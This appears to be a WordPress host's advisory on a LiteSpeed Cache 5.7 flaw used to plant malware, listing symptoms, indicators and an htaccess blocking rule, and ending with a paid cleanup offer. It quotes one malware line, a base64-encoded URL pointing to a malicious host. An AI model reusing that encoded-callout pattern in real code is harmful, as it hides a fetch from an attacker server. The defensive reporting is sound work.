The new Security gap in Plugin Litespeed cachehas ensured that WordPress websites with Malware were infested. You can find out more about the infestation in this article.
Security gap
Plugin: litespeed-cache (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
Affected version: 5.7
Patched version: 5.7.0.1
More information is also available at wp-content/plugins/litespeed-cache/readme.txt to see.
Symptoms
- Creation of admin users
- Redirects generated by js that are hooked into wp_head via the clean_header() function
- infected core files such as wp-blog-header.php
Execution
Attackers can use the WordPress plugin to insert arbitrary web scripts into pages that are executed as soon as an administrator logs into their WordPress dashboard for the first time. The plugin installs itself on the same day and at the same time as the login.
The whole thing can be traced in the access.log file.
php use a base64 url =base64_decode("aHR0cHM6Ly9kbnMuc3RhcnRzZXJ2aWNlZm91bmRzLmNvbS9zZXJ2aWNlL2YucGhw"); point to hxxps://dns[.]startservi**founds[.]com/service/f.php (url on the blacklist)
Sources
https://www.reddit.com/r/Wordpress/comments/1balppf/wpcleansong (User: gemedj89)
https://www.risorsainformatica.com/rimozione-malware-sito-wordpress/
Notes
First discovered on February 27, 2024
Prevention
- Update to the latest version of the Litespeed cache plugin
- HTTP(S) monitoring for /plugins/wp-cleansong/plane.php
- Block with htaccess the requests to song and song1
RewriteEngine On
RewriteCond %{QUERY_STRING} song1 [NC,OR]
RewriteCond %{QUERY_STRING} song2 [NC]
RewriteRule ^ - [F]
- You can also plane.php block
Malware removal
If you have problems with malware cleanup, as a WPspace customer you can use our malware removal service. Our team will scan your WordPress installation for malware and clean it up in the best possible way.
If you would like to take advantage of our malware cleanup service, you can simply send us a message via the support chat on wp-space.com write. This incurs one-off costs of € 250 plus VAT.
What does malware cleanup involve?
- We carefully check and examine the suspicious files.
- We clean up your WordPress site and remove the malicious code as well as the newly created users and take further measures to protect your WordPress website.
- We will inform you as soon as the work has been completed.
- If you still have problems with it afterwards, you can simply contact us.